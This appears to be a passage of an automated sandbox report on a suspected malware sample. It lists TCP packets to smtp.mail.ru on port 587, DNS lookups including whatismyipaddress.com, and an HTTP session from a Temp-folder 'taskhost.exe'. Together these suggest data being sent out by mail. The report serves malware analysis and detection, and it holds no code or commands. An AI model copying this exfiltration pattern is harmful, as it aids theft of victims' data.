Sep 6, 2021 11:22:38.288800955 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.289022923 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.289248943 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.289484024 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.289704084 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.289916992 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.290123940 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.290348053 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.290565014 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.290779114 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.291109085 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.339327097 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.339401007 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.339407921 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.340409040 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.340431929 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.341337919 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.341362953 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.341891050 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.342314959 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.342427015 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.342473984 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.342588902 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.393707991 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.393729925 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.393744946 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.393758059 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.393876076 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.393925905 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.393995047 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.394012928 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.394083023 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.394191980 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.394220114 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.394354105 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.394535065 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.394732952 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.394920111 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.395068884 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.395206928 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.446214914 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.446355104 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.446521044 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.446871042 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.446888924 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.446929932 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.446968079 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.447082043 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.447194099 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.447211981 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.447221994 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.447252989 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.447479963 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.447645903 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.447786093 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.447920084 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.447925091 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.447942019 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.447957039 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.448076010 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.448251963 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.448398113 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.448553085 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.448698997 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.448848009 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.449008942 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.449167967 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.449316978 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.449460983 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.449724913 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.449897051 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.450059891 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.450216055 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.450364113 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.450511932 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.450680017 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.450841904 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.450999975 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.451159000 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.451311111 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.451575041 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.451733112 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.451890945 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.452039957 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.452199936 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.452367067 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.452523947 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.452683926 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.487430096 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.487520933 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.487776041 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.498066902 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.498094082 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.498109102 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.498157978 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.498189926 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.498239994 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.499172926 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.499191999 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.499794960 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.499955893 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.500024080 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.500080109 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.500185013 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.500197887 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.500205040 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.500216007 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.500222921 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.500243902 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501018047 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501137972 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501246929 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501322985 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501367092 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501378059 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501446962 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.501456976 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.502019882 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.502088070 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.502098083 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.502206087 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.503110886 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.503175974 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.503191948 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.503288031 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.503366947 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.504199982 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.504405022 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.504564047 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.504795074 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.504935026 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.505074024 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.505207062 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.505352974 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.505517006 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.505702972 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.505861998 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.506031990 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.506155968 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.506356001 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.506599903 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.506771088 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.506923914 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.507128000 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.507247925 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.507389069 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.507602930 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.507734060 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.507855892 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.507985115 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.508224010 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.509761095 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.510031939 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.510236025 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.510350943 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.510603905 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.510649920 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.510798931 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.511025906 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.511137962 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.511204004 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.511306047 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:38.539272070 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.539302111 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.549644947 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.551357031 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.551379919 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.556443930 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.556535006 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.557450056 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.557507038 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.557581902 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.558547020 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.558585882 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.558620930 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.559607983 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.559643984 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.561580896 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.561625004 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.561662912 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:38.562628984 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:39.047698975 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:39.269846916 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:39.303277016 CEST | 587 | 49721 | 94.100.180.160 | 192.168.2.3
Sep 6, 2021 11:22:39.303375006 CEST | 49721 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:22:58.419142008 CEST | 49718 | 587 | 192.168.2.3 | 94.100.180.160
Sep 6, 2021 11:23:04.335916996 CEST | 49712 | 80 | 192.168.2.3 | 104.16.154.36

                                                                    UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 6, 2021 11:22:08.247072935 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:08.284501076 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:24.427344084 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:24.463366985 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:25.379049063 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:25.416760921 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:25.762196064 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:25.795854092 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:28.858500957 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:28.886203051 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:33.189950943 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:33.217931986 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:33.759963989 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:33.789587975 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:35.330713034 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:35.358179092 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:35.471806049 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:35.498379946 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:37.047529936 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:37.079185963 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:37.460223913 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:37.496215105 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:37.906306982 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:37.906943083 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:37.933733940 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:37.934645891 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:38.050973892 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:38.080091953 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:41.515290976 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:41.548307896 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:54.897388935 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:54.923737049 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:59.577109098 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:59.614623070 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:22:59.882579088 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:22:59.913769007 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:00.002063990 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:00.039280891 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:02.271364927 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:02.305356979 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:03.534266949 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:03.574574947 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:09.484256029 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:09.517220020 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:09.698349953 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:09.735904932 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:14.123003960 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:14.161180019 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:19.028017044 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:19.074403048 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:33.634174109 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:33.677450895 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:48.283610106 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:48.327076912 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Sep 6, 2021 11:23:49.259216070 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Sep 6, 2021 11:23:49.294157982 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3

                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 6, 2021 11:22:24.427344084 CEST | 192.168.2.3 | 8.8.8.8 | 0x3330 | Standard query (0) | smtp.mail.ru | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:25.379049063 CEST | 192.168.2.3 | 8.8.8.8 | 0x5300 | Standard query (0) | 160.192.10.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Sep 6, 2021 11:22:25.762196064 CEST | 192.168.2.3 | 8.8.8.8 | 0xdc7d | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:33.189950943 CEST | 192.168.2.3 | 8.8.8.8 | 0x3569 | Standard query (0) | 160.192.10.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Sep 6, 2021 11:22:33.759963989 CEST | 192.168.2.3 | 8.8.8.8 | 0x2eaf | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:35.330713034 CEST | 192.168.2.3 | 8.8.8.8 | 0x3eed | Standard query (0) | smtp.mail.ru | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:35.471806049 CEST | 192.168.2.3 | 8.8.8.8 | 0xfb08 | Standard query (0) | smtp.mail.ru | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:37.460223913 CEST | 192.168.2.3 | 8.8.8.8 | 0xaec1 | Standard query (0) | smtp.mail.ru | A (IP address) | IN (0x0001)

                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 6, 2021 11:22:24.463366985 CEST | 8.8.8.8 | 192.168.2.3 | 0x3330 | No error (0) | smtp.mail.ru | | 94.100.180.160 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:24.463366985 CEST | 8.8.8.8 | 192.168.2.3 | 0x3330 | No error (0) | smtp.mail.ru | | 217.69.139.160 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:25.416760921 CEST | 8.8.8.8 | 192.168.2.3 | 0x5300 | Name error (3) | 160.192.10.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Sep 6, 2021 11:22:25.795854092 CEST | 8.8.8.8 | 192.168.2.3 | 0xdc7d | No error (0) | whatismyipaddress.com | | 104.16.154.36 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:25.795854092 CEST | 8.8.8.8 | 192.168.2.3 | 0xdc7d | No error (0) | whatismyipaddress.com | | 104.16.155.36 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:33.217931986 CEST | 8.8.8.8 | 192.168.2.3 | 0x3569 | Name error (3) | 160.192.10.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Sep 6, 2021 11:22:33.789587975 CEST | 8.8.8.8 | 192.168.2.3 | 0x2eaf | No error (0) | whatismyipaddress.com | | 104.16.154.36 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:33.789587975 CEST | 8.8.8.8 | 192.168.2.3 | 0x2eaf | No error (0) | whatismyipaddress.com | | 104.16.155.36 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:35.358179092 CEST | 8.8.8.8 | 192.168.2.3 | 0x3eed | No error (0) | smtp.mail.ru | | 94.100.180.160 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:35.358179092 CEST | 8.8.8.8 | 192.168.2.3 | 0x3eed | No error (0) | smtp.mail.ru | | 217.69.139.160 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:35.498379946 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb08 | No error (0) | smtp.mail.ru | | 94.100.180.160 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:35.498379946 CEST | 8.8.8.8 | 192.168.2.3 | 0xfb08 | No error (0) | smtp.mail.ru | | 217.69.139.160 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:37.496215105 CEST | 8.8.8.8 | 192.168.2.3 | 0xaec1 | No error (0) | smtp.mail.ru | | 94.100.180.160 | A (IP address) | IN (0x0001)
Sep 6, 2021 11:22:37.496215105 CEST | 8.8.8.8 | 192.168.2.3 | 0xaec1 | No error (0) | smtp.mail.ru | | 217.69.139.160 | A (IP address) | IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • whatismyipaddress.com

                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49712 | 104.16.154.36 | 80 | C:\Users\user\AppData\Local\Temp\taskhost.exe

Timestamp | kBytes transferred | Direction | Data
